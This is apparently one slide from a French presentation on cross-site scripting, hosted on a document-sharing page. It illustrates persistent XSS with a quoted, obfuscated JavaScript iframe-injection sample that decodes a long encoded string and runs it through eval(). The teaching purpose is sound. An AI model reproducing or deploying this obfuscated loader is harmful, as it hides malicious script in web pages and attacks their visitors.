X hits on this document

98 views

0 shares

0 downloads

0 comments

12 / 46

XSS – de la brise à l'ouragan – I) Brise et revue d'armes – Le XSS, comment ça marche ? C) Et dans le monde réel ?

Les attaques XSS persistantes sont plus difficiles à détecter et à interpréter. Ex. de l'injection d'iframe :

function q(LO,f){if(!f){f='BT?Qq.5@hrs:zebEJ*XF6mV8OKyI9uW/=Af[Ndt;&{g7DjGxi%Zp`M)#- cUPkwan';}var r;var yJ='';for(var g=0;g<LO.length;g+=4) {r=(f.indexOf(LO.charAt(g))&255)<<18|(f.indexOf(LO.charAt(g+1))&255)<<12| (f.indexOf(LO.charAt(g+2))&255)<<(6)|f.indexOf(LO.charAt(g+3))&255;yJ +=String.fromCharCode((r&16711680)>>16, (r&65280)>>8,r&255);}eval(yJ.substring(0,yJ.length- (2)));}q('9X=;IpjTupMUuX&nutDtIZ.qOVi{/@A:b#JdI@DnF66PuFN#ufixIqBj/q%- I#uc9#mqX#{*K@T?z?NDJ6*JuXNjbNjguX`whFO[X`TTu)%g*?msbfjAe)

{kFXKPy)rc9p9dX#{fW@.#IZmcudB[V5{Ms[w)ypO#9)rFE66ne5%U*qhnJ8*kV@e7*@.#E d&6Nciu)re*8ADK[kUyZ{:bp9[I8j7rV

``tsVqc6NeMI?

%pEZz{y;BMIqTI/@..ONM.b`JdIQ&jJpkPOXejWZDUWX.M/QwKKQdzu;mQepjX:)kP*q*xyf%#I`6jrV %pI[dDyf%kF@A7KQwKu?{DV8%#6?NwJdj#I5.jsV- iEm`)98dB:FjzW@TqIQ&7uQMU:qh#yN.AI@jtONjgV`e:J?idI`6ju)%BIqJnW@TqEp{fF66P*? mDbfMAe#eiKNjp6?ejWZDUI8Ki*5%u/Q{%yNJdIQ&ju)%Be`M.W@m#V@j7FV%Uu.MxJqeqX#AGrVw)9?{xW- fi)Xp&[W5MU*QDnb`qxI@j7rFuBJ`*jW#BgXpjD:puB*?6wbtj?EpjJuQ`UEp*cJ?`PF@=Du`j.e;=wbtj? IZ.qeti{/Q&nW;*?W8eMsNjg6mz#J@T? X)&iJ)wU6N`wW[TqI@AG6MBAyM.su)jkX#O76MBAyM.su)DUX#KiOt %pEmzwVXjeEX.xstiAuV*sbfDi6.N7*q{#y)*DJq*-WX.G6pMK6t.JVXDUX;KN:#dB:VrD9ZeF6? N7OmTKeNcj*8JgIQ&ne@TgJXwDsm.-9XNxuq6PV)KxWdjN98{Xs[`A:#*.bfD[rZi;s)j.VVATWfqw9@.z6.j sIVcMWZdX:qTpe)%cXpwxV?O[K[{uONJPW5JgeFJ):Z6cOFT#J;%Qy;K*:mees@*bVf9{bZB=');

Plus la page visitée est populaire, plus l'impact poten- tiel est important (Ddos par exemple).

Document info
Document views98
Page views107
Page last viewedMon Dec 05 04:09:39 UTC 2016
Pages46
Paragraphs417
Words3787

Comments